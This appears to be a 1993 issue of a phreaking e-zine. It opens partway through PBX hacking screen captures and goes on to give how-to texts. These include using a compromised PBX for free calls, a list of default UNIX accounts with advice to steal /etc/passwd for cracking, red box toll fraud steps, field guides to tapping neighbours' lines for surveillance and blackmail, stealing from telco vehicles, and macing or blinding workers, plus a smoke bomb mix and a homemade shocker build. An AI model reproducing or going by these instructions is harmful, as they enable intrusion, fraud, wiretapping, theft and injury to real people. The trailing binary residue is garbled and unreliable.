display trunk-group 9                                             Page  1 of  5

                                

                                TRUNK GROUP



Group Number: 9                    Group Type: co            SMDR Reports? y

  Group Name: fax wild line               COR: 1                      TAC: 79

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60             Night Service: 299

Queue Length: 0                                      Incoming Destination: 267

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: code



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervision Timeout:                    Suppress # Outpulsing? <

display trunk-group 9

  Command aborted

____________________________________________________________________________

[everything's great!]

 

 enter command: logoff

[Sooooooooo.....We logoff...]

[To use yer PBX, just dial in, and type:

  <YER CODE>+9+1+ACN!!

  Or to set up an alliance, replace the 1 with a 0...]





THE SECOND HACK

~~~~~~~~~~~~~~~

[I started this capture a little late, after I had already looked thr  ough

a few things.  It still gets the point across, tho.  It displays going

thru, and not changing ANYTHING!]





 enter command: dis rem

[I look at the remote...]

____________________________________________________________________________

display remote-access                                             Page  1 of  1



                                REMOTE ACCESS

               

               Remote Access Extension: 599

                   Barrier Code Length: 5

           Authorization Code Required? n



BARRIER CODE ASSIGNMENTS (Enter up to 10)

        Barrier Code    COR COS                Barrier Code    COR COS

     1: 52290           1   1                6:                 1   1

     2: 11111           1   1                7:                 1   1

     3:                 1   1                8:                 1   1

     4:                 1   1                9:                 1   1

     5:                 1   1               10:                 1   1



_________________  ___________________________________________________________

[I see that there are 2 codes and an extension already set up.  I am wary 

of code number 2..It could be a trap code]

 



 enter command: dis trunk 7

____________________________________________________________________________

display trunk-group 7                                             Page  1 of  9



                                TRUNK GROUP



Group Number: 7                   Group Type: co            SMDR Reports? y

  Group Name: REMOTE ACCESS              COR: 63                     TAC: 707

   Direction: two-way       Outgoing Display? n

 Dial Access? y               Busy Threshold: 10           Night Service: 599

Queue Length: 0                                     Incoming Destination: 0

   Comm Type: voice                Auth Code? n    Digit Absorption List:

    Prefix-1? n                  Restriction: code

                                 Trunk Flash? n

TRUNK PARAMETERS

            Trunk Type:   ground-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

     Terminal Balanced? n                               RA Trunk Loss: 0db

 Answer Supervision Timeout: 10            Receive Answer Supervision? <

display trunk-group 7

  Command aborted

____________________________________________________________________________

[I see that trunk 7 already has the extension ready to use!!!!!!!!]

[FREE LD and no changes!  They will not know I was ever there!!!]

[I look at page's 2 and 3 for the fone numbers to dial in to, and then

I'm OUTTA THERE!!!]



 enter command: logoff



    --I hope these captures helped..

              --Panther Modern TNO/TBF





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>









                    /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\

                   *|     The TNO Hacking Crew Presents   |*

                   *|                                     |*

                     *|            UNiX Defaults            |*

                    \                                     /

                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





INTRO

~~~~~

This a list compiled by the members of The New Order from frequent visits to

UNiX hosts.  These are default accounts/passwords observed in hosts running

UNiX variations including System V, BSD, Xenix, and AiX.  These defaults are

included in standard setup on various machines so the Sysadmin can log on

for the first time.  Often the negligent Sysadmin forgets to delete or pass-

word the accounts.  This makes UNiX machines extremely easy to infiltrate.

This artical does not go into specifics of hacking but it is highly

suggested that you immediately copy the /etc/passwd file (/etc/security/

passwd in AiX machines!) so you can later run a dictionary hacker and get

some other accounts and insure your access.  This is list of default

accounts which are often unpassworded.  If the system asks for a password,

try t  he account name which sometimes works.





DEFAULTS

~~~~~~~~

root                         bin                     adm

makefsys                     sysadm                  sys

mountfsys                    rje                     sync

umountfsys                   tty                     nobody

checkfsys                    somebody                setup

lp                           powerdown               ingres

dptp                         general                 guest

daemon                       gsa                     user

trouble                      games                   help

nuucp                        public                  unix

uucp                         test                    admin

student                      standard                pub

field                        demo                    batch

visitor                      listen                  network

uuhelp                       usenet                  sysinfo

cron                         console                   sysbin

who                          root2                   startup

shutdown                     ncrm                    new





CONCLUSION

~~~~~~~~~~

Have phun but be careful!  Learn what to do before you run out and invade

some systems.  These won't do you any good if you can't hide your tracks.

Hacking is all about learning about cool stuff, but you can't hack until 

you learn how.  Njoy.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>







                            HoW To MAiL FoR FREE

                                 BY KARB0N

                                  -=TNO=-





        Postal chislers used to mail letters unstamped in the knowledge 

that they would be delivered anyway... with "Postage Due"to the recipient.

It took a stingy person to mail personal letters this way, but many people 

did send mail this way on bill payments. So the Post Office changed it's 

policy. It stopped delivering letters without stamps. But a letter with a

s  tamp.. even a one cent stamp...is delivered postage due if need be. A letter

with no stamp is returned to the sender.



        Naturally, this has just opened up a new way pf cheating. Letters can

now be mailed for free by switching the positions of the delivery address and

the return address. If there is no stamp on the envelope, it will be Returned

to the address in the upper left corner.. which is where you want it to go in

the first place. Unlike the old system, the letter is not postage-due. At

most the recipient gets a stamped purple reminder that "The Post Office does

not deliver mail without postage."



        At least one large company seems to have adapted this principle to 

it's billing. Citibank bases it's MasterCard operations in Sioux Falls, South

Dakota. The bill payment envelopes have the Citibank Sioux Falls address in

both the delivery address and return address positions. (Most bill payments

envelopes have three lines for the customer to write in his or her return
  
address.) Therefore, regardless of whether the customer puts a stamp on the

envelope, it is delivered to Citibank. (The return-address gimmick works even

when the return address is in a different state from the mailing point.)



        Who is cheating whom? If the customer puts correct postage on the

envelope, it is delivered to Sioux Falls at the customer's expense. No one

is slighted. If, on the other hand, the customer intentionally omits the

stamp, the payment is delivered at Post Office expense. Then the customer has

cheated the Post Office. The Post Office also loses out if the customer

honestly forgets to put a stamp on the envelope. But then blame ought to be 

shared with the peculiar design of Citibank's envelope.



        Citibank's motive is plain: If the envelopes are returned to forgetful

customers, it delays payment.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>









                    (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\

                      (*)                                 (*)\|

                    (*)           |>ead|<at             (*)\|

                    (*)            presents             (*)\|

                    (*)                                 (*)\|

                    (*)         HOW TO RED BOX          (*)\|

                    (*)                                 (*)\|

                    (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\|

                     \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\|





INTRO

^^^^^

Red boxing has quickly become Colorado's elite game of choice.  Ever since

I dug up the 2600 plans and passed them out, it seems like every phreak in 

Colorado has built one.  Many questions, though, have arisen.  To hopefully

cut down on my e-mail, I present here the complete guide to using red boxes.





CHOOSING A PAY PHONE

^^^^^^^^^^^^^^^^^^^^

This is the simplest part of red boxing.  You must use an authentic U.S. 

West (or other Baby Bell) payphone.  If the p  hone does not say U.S. West

or have the bell symbol somewhere on it, it is a COCOT and cannot be boxed.





LONG DISTANCE

^^^^^^^^^^^^^

The most common reason for building a red box is of course to make long

distance calls.  This is also the easiest way to use them.  To make the 

call just dial:



                      1 + Area Code + Number



You will then here a computer voice ask you to deposit an amount of money.

Make the quarter tones until you hear the voice say "Thank you".





LONG DISTANCE WITHIN AN AREA CODE

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This is a little bit trickier.  Normally, U.S. West handles any calls within 

an area code.  Unfortunately, U.S. West switching systems are not fooled by

red box tones.  To get around this inconvenience, you must route your call

through a long distance carrier.  You must first decide which carrier you 

want to skam.  Here is a list of some of the major carriers available in

Colorado and their equal access cod  es.



AT&T         10288 or 10732

MCI          10222 or 10888 or 10789

Sprint       10333

Metromedia   10488 or 10999

Encore       10805 or 10555

Allnet       10444

Tel. Xpress  10465

ACI          10244

U.S. Tel.    10471

LDDS         10001

One 2 One    10390



To make the call dial:



                    Access Code + 1 + Area Code + Number



Once again you will be told to deposit money, feed 'em the quarter tones.





LOCAL

^^^^^

To make a local call, you must also route the call through a long distance

carrier.  To make the call, dial:



                          Access Code + Number



Thats it!  You will be told to deposit money as usual so unleash the tones.

                       



DURING THE CALL

^^^^^^^^^^^^^^^

If your call is over five minutes, you will hear a click at that time.  This

means you have spent all your money and are running on credit.  Two minutes

later you will be cut off temporarily and you will hear the computer ask you

for some mo  re money.  Deposit tones until you hear the voice say "Thank you".

Remember, the party you are calling will here the tones as well.  After you

have "paid" you will be reconnected to your party.





AFTER THE CALL

^^^^^^^^^^^^^^

When you are done, push the reciever down for a few seconds then let off and 

listen.  If you went over your time, the computer voice will come on and ask 

you to pay the amount you went over.  Pay with tones as usual.  If you just

hang up, the phone will ring and there will be an operator on the other end

asking for money.  Don't use the red box if you are talking to an operator.

Either pay with real money or take off.





CONCLUSION

^^^^^^^^^^

Red boxing is phun and easy as long as you know what you are doing.  Memorize

those access codes (or at least one) and you will be good to go.  I have 

been red boxing for quite a while now and have never had any problems nor 

have any of my receiving parties ever been harrassed by the Gestapo.  If you

don't have the pla  ns, call your local P/H BBS or contact somebody in TNO or

leave me mail on Flatline.

__________________________________________________________________________

(C)opywrong 1993, DeadKat Inc.

All wrongs denied.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>

                               





(Editor's note:  The following two file are the best files I have ever read                               

 on field phreaking.  They were written by Denver Hacker's a few years ago.

 Since they were not widely distributed I have included them here for your

 information.  Unfortunately we were not able to contact the original authors

 to get permission to reprint them.  As far as we know, The Third Cartel is

 defunct.  If any previous members of the group read this publication, we

 ask that they get in contact with us at Flatline.)

                               



                               -/\-/*\-/\-/*\-/\-

                                  The Third Cartel

                               -\/-\*/-\/-\*/-\/-

 

                                   Presents:

  

                               Field Phreaking I

                              -=-=-=-=-=-=-=-=-=-

                                  June,  1988

 

Introduction:  The purpose of this manuscript is to introduce useful phreaking

-------------  techniques.  These techniques have been developed by the Third

Cartel and have proved to be convenient and reliable.  

 

Field Phreaking Kit:  

====================

 

The Field Phreaking Kit is a neccessity for the serious phreaker.  Some 

so-called phreaks get all of their information including codes from BBSs and

have an ego big enough to call themselves phreaks.  The real phreak acquires

knowledge on his own through perseverence and ingenuity.  Following is a list 

of useful items for your Phreaking Kit:

 

o  Backpack:  Get one:  Very Handy.  We'll tell you how to get one or make one.

o  Ratchet Set:  Usually, you'll o  nly need 7/16 and 3/8" size ratchets.

o  Screwdrivers:  Get medium and large screwdrivers, and a phillips head.

o  Wire Cutters:  Just in case you want to wipe out some lines.

o  Pliers:  For misc. stuff.

o  Xacto or Pocket Knife:  To strip or cut wires.

o  Penlight:  Nice and small; very useful for night work.

o  Flashlight:  If you need lots of light and have enough room in your pack.

o  Gloves:  Make sure you don't get shocked or leave your fingerprints around.

o  Pencil and Paper:  Write down locations, notes, numbers, etc.



------------------------------------------------------------------------------

 The Third Cartel carries the following optional materials in their Field Kit:

-------------------------------------------------------------------------------

o  Walki-Talkies:  For communications when yelling isn't possible or smart.

o  Battery Operated Camara Flash:  Good for flashing in someone's eyes at night

                                   Will blind a telco guy for a f  ew seconds.

o  Mace/Dog Repellant:  Spray in someone's eyes if they give you trouble.

o  Smoke Bomb:  Helpful to divert attention or scare. [drop in telco car]

                [Mix 3 parts potassium nitrate with 2 parts sugar and melt]

o  Matches:  For smoke bomb or anything that is flammable.

o  Bandana/Surgical Mask:  Manholes are dusty; Wear these for easier breathing.

o  Marker:  Mark your "territory" on phone boxes.

o  Fake Telco ID Card:  Will make some people think that you work for telco.

 

Organize your kit so you know where everything is and can get something quickly

when needed.  You don't want to be fumbling for your mace when the gestapo is 

about to get you.

 

Test Phone:

===========

 

The Test Phone is the most useful piece of equipment for Field Phreaking.  You 

can try to sneak into a telco Plant Department [truckyard] and get a real test 

phone out of a truck like we did.  If you'd rather not do this, don't worry; 

making your own test phone is ultra-easy.

 

First, ge  t a telephone for your own purposes.  Find the wire coming out of the

phone that is supposed to go to the wall's modular jack.  It should be at least

three feet long for convienience.  Cut off the modular jack at the end of the 

wire.  Strip the wire, and there should be two or four small  wires inside.  

Hook the two middle wires to alligator clips [preferably insulated]. You now 

have a test phone!  Very easy, indeed.  Now let's see if you hooked everything 

up ok.  First find your phone box.  It'll probably be on the outside of your 

house.  It's farly small, and you might need the ratchet to open it up.  Once 

you get it open, you should see some screws.  These are the terminals for your 

phone line.  Hook the alligator clips to the two top terminals.  If your phone 

is ok, you should get a dial tone.  Once you know that your phone is working, 

a whole new world opens up to you!  You can hook the phone up to your 

neighbor's terminal and call long distance or ye  ll at the operator on their 

line.  Be careful, though.  You don't want to be talking to Sue in L.A. when 

your neighbors are home and awake.  If they pick up the phone when you're 

already on, you could get into serious trouble.  Of course, you could always 

listen in on them!  If you want, you can hook wires up to your neighbor's 

terminal and lead them to your house.  In case you didn't know, this is called 

Beige Boxing.  You can then hack computers on their line, call Dial-A-Prayer, 

etc.  Make sure to hide the wire well so that it won't be traced to your 

house!

 

Manholes:

=========

 

One way to get access to an abundance of phone lines is by getting into telco 

manholes.  You don't want to accidentally get in a sewer manhole, so the first 

thing to do is find the differences between sewer and telephone manholes.  If 

you have trouble with this, here's a few tips that might help:

o  Telco manhole covers are usually larger and heavier than other covers.

o  Telco manholes are scarc  e compared to sewer manholes.  So if there are

   a lot of checkered manhole covers in your area, those are probably sewer 

   manholes.  If there are only a handful of unmarked manhole covers in

   your area, those probably contain phone lines.

o  Go to your local telco Central Office [CO] and find out what the manhole 

   covers look like there.  Find manhole covers that look the same in other

   areas, and pick a convenient/safe manhole to explore.   

 

Getting into a manhole is a different story.  Here in the Denver area, it takes

at least three people to get a manhole cover off.  Hopefully it'll be easier

to do in your area.  To open the manhole, you'll probably need at least two

crowbars [You could try using a pickaxe].  Get a group together to open the 

manhole, using 2 or more people with crowbars to slide the cover off.  You 

might want to get a strong guy to push the manhole cover while the other people 

with crowbars support it.  If you know of a tool that was mad  e specifically

for opening manholes, we'd appreciate it if you contacted us on some local 

Denver boards and told us about it.  Likewise, if you have a better system for 

opening manholes, we'd be grateful for the information.

 

Once you get the manhole cover off, shine a flahlight down to see if there's 

a ladder going to the bottom.  Try a different manhole if there's no ladder.  

If you want to go down a manhole, don't forget to wear a bandana or surgical 

mask over your mouth so that you don't choke on dust.  Also bring a flashlight 

so you can see what you're doing.  Many times, there'll be a few inches of 

water at the bottom, so you might also want to wear boots.

 

Down in the manhole, you might find some equipment or manuals.  Go ahead and

take them if you want; you deserve it!  There should be some very large ABS.  

The phone lines are inside these tubes.  Attached to this tubing there will 

be some short, wide plastic cylinders.  There'll be screws holding these 

cylinders    on to the tubing.  You'll need either a screwdriver or a ratchet 

to open a cylinder.  If you happen to get a cylinder open, congratulations!  

You now have access to countless phone lines!  We'll leave it to you to 

figure out what to do with all of those wires.  Surely you'll figure 

something out!  [snip, snip!]

 

Exploring Telco Building Sites:

===============================

 

One of the best ways to get information about telco is by going to a Central

Office near you, exploring the trucks in a Plant Department, or "visiting"

other telco buildings.  The phone company is careless in many ways.  They 

leave important, yet unshredded documents and computer printouts in their

open dumpsters.  Their cars, vans, and repair vehicles are almost always left 

unlocked.  Inside their vehicles one can usually find manuals, test phones,

computer cards [usually for mainframes, almost never for personal comuters], 

nice tool sets, etc.!  It's almost as if they *want* to be ripped off!  They 

deserve ba  d treatment just for their negligence.  If possible, we like to be 

courteous to individual employees of telco.  Most employees are fairly amiable 

and don't deserve trouble.  It's the beuracracy of telco that deserves to be 

manhandled.  Cheap practices such as monopolizing and the overpricing of 

services is the general reason why we phreaks do what we do with such 

determination.  On with the show.

 

Exploring Dumpters:  Looking inside telco dumpters is probably the easiest way 

to acquire useful information.  Typycally, dumpters will be found outside a

Central Office.

                                

                               

                               

                               -/\-/*\-/\-/*\-/\-

                                The Third Cartel

                               -\/-\*/-\/-\*/-\/-

 

                                   Presents:

                               

                              Field Phreaking II

                                -=-=-=-=-=-=-=-=-=-

                                  July,  1988

 

Introduction:  The purpose of this manuscript techniques have been developed 

by the Third Cartel and have proved to be convenient and reliable.  This 

manuscript is a continuation of Manuscript II: Field Phreaking.

 

Pay Phone Hacking:

==================

 

The safest way to get phreaking codes is by hacking them on a pay phone.  The

chances of getting caught are extremely remote, especially if you switch pay

phones every few minutes.  One problem with hacking codes is that when you find

a code by dialing it randomly, you often forget what code you dialed.  To

prevent this, we print out a sheet filled with 6-8 digit random codes on the

computer.  Then we start testing each of these codes off of a 950 number.  This

works great, especially since 950s are not charged!  Cross off each code on the

paper that doesn't work, and mark the ones that do work.  This technique takes

a lot of patience, b  ut it's worth it if you have a terrible short-term memory.

 

Telco Boxes:

============

 

This is our prime focus in Manuscript III.  Every field phreaker worth his

weight in dung should at least know the basics about phone boxes.  There are so

many different types that we can only cover the major groups.  But once you

learn about a few boxes, it'll be easy to learn about others.  Be sure to

bring a test phone with you [see Manuscript II] so you can connect up to phone

lines.

 

Small Boxes:  Small telephone boxes typically contain 1 to 20 different phone

------------  lines.  They are usually in convenient and safe locations.  They

are easy to open, and can be closed quickly.

 

Home Boxes:  Unless you live in an apartment complex, your home box shoud be

very easy to locate.  It is small box located on the side of your house;

usually a foot or two of the ground.  Many times it will be beige colored

and may require a ratchet [Usually 3/8"] to open.  If you have more than one

line in you  r house, your box will probably be fairly large and light gray.

You'll need a ratchet and a screwdriver to open a two-line box.  In the

one-line box there will be five terminals or screws.  The top two screws should

have red and green wires leading to them.  If you connect your test phone clips

to these screws, you'll be on the line.  Usually, the two screws below contain

the same phone line.  The very bottom screw, in the middle, is the ground.  In

the two-line boxes, you should be able to figure out how to hook up to the

lines rather easily.  They even have a modular plug jack that you can plug a

normal phone into.  There are also several terminals that you can hook the

clips up to.

 

Aluminum Multi-Line Boxes:  These boxes are usually found behind business

buildings and shopping centers.  Some condominium complexes also have these

boxes hooked up to walls on a few units.  Each box contains five or more phone

lines.  The boxes are rectangular and made of aluminum, are very   easy to open

and close, and often say "Western Electric" on the front.  Once you get the box

open, you will see several pairs of terminals grouped diagonally.  Simply

attach your phone clips to a correct pair, and you'll be on a phone line.  Run

an ANI on the phone line to find its number.  If your phone happens to be

polarity sensitive, and you get no dial tone when hooked up to terminals,

reverse the alligator clips and you'll be on the line.

 

Small Distribution Boxes:  These boxes, usually either light green, or a very

dark green, are not very common, and can be found behind shopping centers,

houses, and other buildings.  You'll probably need the ratchet to open it,

and a knife to strip some wires.  The top of the box pulls off if you loosen

the screws enough.  Inside, there will be several wires.  Two different sizes

of wires are found in distribution boxes.  The larger wires lead to nearby

buildings.  The smaller wires lead to another distribution box where the  y are

spliced yn.  These boxes take the most time to use because they have no 

terminals and you have to find the correct wire pairs.  It's easiest to find 

the large wire pairs, so start out with those.  Once you find a phone line, 

you might want to tape together or label the wire pair for future reference.  

Use the same procedure for the smaller wires.  If you find a good box, and 

are willing to take the time, these boxes can be very worthwhile!

 

Medium Boxes:  Medium boxes carry more lines than small boxes but are usually

-------------  found in somewhat risky locations.  Most of them require a

ratchet for access, and they usually open on a hinged door.

 

Medium Distribution Boxes:  These are identical to the small distribution

boxes, but carry far more phone lines.  Many times, after taking off the cover,

there will be a flat access plate you can open with a ratchet.  Use the same

procedure for this box as outlined in the small distribution box description.

 

  Flat Peg Boxes:  Flat Peg boxes are frequently found behind grocery stores,

shopettes, and other businesses.  Sometimes they can be found in an office

phone room or in the back halls of shopping malls.  They are typically big,

square boxes mounted to a wall and are opened by a handle on a hinged door.

Sometimes, they are mounted away from a building.  We've seen some that are

double sided and require a ratchet to open.  Inside, the terminals will be

grouped in approx. 10 X 3 inch columns.  The terminals are long flat pegs.

There are four terminals per row.  It is sometimes difficult to hook up to a

line since the terminals are so close together, but you'll get the hang of

it after a few tries.

 

Large Boxes:  These boxes sometimes contain hundreds of phone lines.  They are

------------  found along busy streets and in business areas or apartment

complexes.  You'll need a ratchet to open one.

 

Wire Box:  The wire box is about three feet tall and has two doors opened by

one latch.    The wires lead into long, plastic, rectangular grouping stations.

There should be a tool attached by two screws to the side of a door.  Connect

your phone clips to these screws.  Now connect the tool to a plastic grouping

station.  If you connect the tool correctly, you will be on a line.  

The bes contained in a single grouping station.

 

Terminal Boxes:  In our opinion, the terminal box is the king of boxes.  A

single box may contain up to eight hundred lines.  You can't miss these boxes

because of their size.  They stand at least four feet tall and have the

characteristic light green color of most boxes.  After opening a box, you will

see many red and white numbered terminals pairs on each side.  On the inside of

each door, there are two screws to connect your test phone to.  Leading out

from the screws is a double current alligator clip that can easily connect to

any pair of terminals.  This easy connection tool makes this the most

convenient box to use, an  d the most profitable.

 

Helpful Tips:  Now that you know how most major boxes work, you'll be able to

-------------  figure out how other boxes work.  By now we're sure you have

thought of some interesting things to do with boxes.  Here are some tips you

might find helpful.

 

The Perfect Box:  The most tedious step in field phreaking is finding "The

Perfect Box."  This box should be located away from streets and hidden from the

view of homes.  When working on this box, there should be no worry of being

caught or observed.  Finding this box might take quite a while, but don't give

up hope; it's well worth the time and effort.  Try looking around waterways

such as creeks, lakes, and ditches.  If you have easy access to wilderness

areas, such as the mountains, try looking for Perfect Boxes around there.

 

Beige Boxing:  We're not sure exactly who invented the beige box, but it can be

extremely useful for surveillance and blackmail purposes.  The only materials

you need for a beig  e box are two wires and your test phone.  Connect the wires

to the ring and tip of the line you want to tap.  Make sure your wires are

hidden, and lead them to your house or other location.  You then can connect

your phone to the wires and listen in on conversations or use their phone line

however you want.  Make sure that you don't use a boxed line when the victim

is likely to pick up his phone and hear you.

 

Safety Tips:

 

o  Well, first of all, be extremely careful when choosing a box to work on.

   Two of us got arrested for using the wrong box at the wrong time.  Make

   sure that nobody will see you when you're working on it, because you're

   putting your record at risk.  Of course, if you're under 18, you don't have

   to worry quite as much, but going to court is not K-Rad.

 

o  Try wearing gloves when working on phone lines.  You don't want to get

   shocked or leave fingerprints around.

 

o  If you ever open a box that has huge cables in it, it's probably a power

     box.  The power box is usually dark green and stands a few feet in height.

   Don't even think of messing with one unless you want to risk having a

   painful death.  If you absolutely *must* disconnect someone's power, then

   use *EXTREME* caution when disconnecting the cable.  Wear heavy duty gloves,

   make sure that you aren't wet, and don't use metal tools.

 

o  Always look for your boxes at day, and work on them at night.

 

o  Have a getaway bike or car ready in case of an emergency.

 

o  If anyone catches you, act cool and calm.  You don't want to say "uh, well,

   umm...well I was just uh...," because that makes you look suspicious.

   *Always* have a story ready *before* you start opening boxes!  This has

   saved us a couple of times.

 

o  You might want to incorporate your fake I.D. card into the scheme so people

   think that you work for the phone company.  Remember, this won't work on

   telco employees.  Only attempt to fool average citizens.  If they call the  

   cops or telco, take off.

 

   This concludes Manuscript III.  We described most of the major phone boxes

so that you'll be able to figure out how other boxes work.  





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>







                        -=How to make a ZaPPeR GuN=-

                        -=By Panther Modern TNO/TBF=-





  The zapper gun is kinda like a commercial stun gun.  It is not as 

powerful, and is mainly used to piss people off, not to put them down.

It will scorch skin very painfully, if applied.  Total cost for it is

around $20-$25, and it is a fun thing to make if yer kinda bored.

  If you don't know what a capaciter is, read no further, go find out

what one is/what one looks like, then come back.  Anyway, materials

are:



--------------------------------------------------------------------

Qty           Description                        Approx price

----------------------------------------------------  ----------------

01       Disposable Fugi-Film FLASH camera        $15+TaX

01       Small-Mid radio shack projekt BoX        $2-$3 or so..

02       Dry wall nails                           10-20 cents

01       Radio Shack SPST Push Button             $1.50

01       1 Alkeline AA battery                    $0.50

--------------------------------------------------------------------

           This is to make a fairly nice version.

           For the raw, crappy version, all you

           need is the camera.  I won't even go

           into details on making it, you can 

           figure it out for yerself.

--------------------------------------------------------------------



  Okay.  Get the camera.  If you want, take some pictures.  ALL OF THEM, 

or none of them.  Cause if you don't take all, you'll ruin the film..

Now, when yer ready, first, rip off the cardboard.  You'll have a plastic

box.  Open it up, as well as you can.  Be very careful not to damage the

circuit board, wire  s, flash, etc.  Once it's open, discard the plastic

case, and the film.  Now, looking at the circuit board, one can see

a fairly empty space.  Rite in the middle of it, will be 2 small copper

"plates."  Soldier your button to this place.  YOu may also remove the

flash at this time, as it will be shortly rendered useless.  Also, you will

notice two protrusions of copper strip.  Pull 'em off, and MAKE SURE they 

aren't touching when you finish, cause it will ruin the gun.  Next, put 

the circuit board in the project box.  Drill one hole so you can see the 

LED.  THis will tell you when the gun is ready to FIRE!  (When the LED 

flashes).  Next, line up approx where you want your two tips.  Line up 

the capaciter with this.  Drill holes.  Next, drill one last hole where

you want the button.  Now, remove the generic AA battery in the camera, 

replace it with your hi-quality Alkeline AA battery.  Now, stick the nails

in, and soldier them via wires to the two capaciter leads.  Seal them in

place with   either expoxy or hot glue.  Now, wire up your button, and stik

the LED in the hole you made for it.  CLose up the box.  Your gun is made..

Just push the button, holding down for apporx 2 seconds until the lite 

flashs, and touch whatever you want to SHOCK.  This gun is semi-lame, but

is also fun, and good for boredom..Have PhUn!!





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>





            



                          Comments on Phrack 42

                               by Karb0n

                                -=TNO=-





Ok...I was reading a little of Phrack 42...in the first part of the issue I 

read this short post on turning traffic lights to green on your side....

I'm here to tell that fucker that you cannot do that anymore... Maybe where

he lives you can...but not in Colorado.....he must have had an old system.

Now i'm sure there are a few old lights around 303 that can still be used that

way but...the metro are is not   possible....i'll explain:



There are three different ways to change a stoplight in your direction to 

green.



1) Manually Activated Devices:

Traffic conroll devices of this type operate by a switch that is manually held

until a Fire Engine or Ambulace clears the intersection. This switch can be 

set up on an automatic timer that iterrupts traffic flow until the apparatus

responds, thens turns the light cycle back to normal.



2) Siren Activated Devices:

The siren of the Apparatus or Police Unit activates this traffic controll 

device. A sound pick-up unit is located at each MAJOR intersection. This unit

filters out all other noise except the siren and sends a signal to the traffic

light selector in the control box. The traffic light selector holds the 

yellow light for a few seconds (to let cross-traffic pass through) and then

switches to red..which flashes at double the normal rate.



Alot of people think  there car horn will set some of these off....no! Not 

true!



3) Light Activ  ated Devices: (This is the one that d00d talked about in Phrack)

This type of traffic controll device is activated by a Pulseating, High-

Intensity Stobe light that sends a signal to a detector located at each major 

intersection. This dector holds the light green...if it happends to be green

when your going through it, or speeds up the normal cycle to green in the 

direction of travel...(note: This means there is a RED light on three sides 

and GREEN only on yours). There is an indicating light located next to the

light detector, assuring the driver that the traffic signal is in controll

by the stobe light.



Ok...The name of the stobe light system is called an OPTICOM. The key word in

the upper paragraph was "HIGH-INTENSITY"...normal car do not have high 

intensity lights...even when you put your brights on. The OPTICOM flashes at

over 14 times a second...it almost looks like a regular solid light..but nope.

If you guys don't know what i'm talking about...next time you see a F  ire Truck

running with lights and siren...look at the top of the engine and you'll see 

it flashing away...actually..I think it's the most noticable thing....



Note: Police cars do not have these on them....and only some Ambulances.

The reason Cops don't have them is because they have a car that is easier to

manuver through other cars and intersections. But a fire enigine..with alot

of water and very heavy can't turn on a dime...you'll be screwed in a second!

So thats why Fire trucks have them and cops don't. SOme ambulances do  ...so

keep an EYE out for it. 





                                        Karb0n -=TNO=-



   Greets-



                Cavalier: Have you come up for air yet?

                Dead Kat: Was I abducted?

         Nuklear Phusion: Dude... the Delphi died.

           



<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>





CONCLUSION

~~~~~~~~~~

     Well, thats it for our first issue.  The next ones should be a bit longer

and probably more technical.  We hope that you found this publication both

useful and interesting.  If you have the urge to write a text file, please 

contact us at Flatline.  The number is posted on many BBS's and many quality

hackers have the number too.  If you have any comments about this file, please

let us know.  We are more than open to suggestions on how to improve this 

'zine and would appreciate feedback.  Look for issue number 2 on a quality

BBS near you!





     DSET   |    ( H       n d  t                        <             
                             6    *                           <                    DSET   |    ( H             |                                                           @H          6    *                           <                        FNTM       H         	Helvetica                                                            Geneva                                                         CUTS    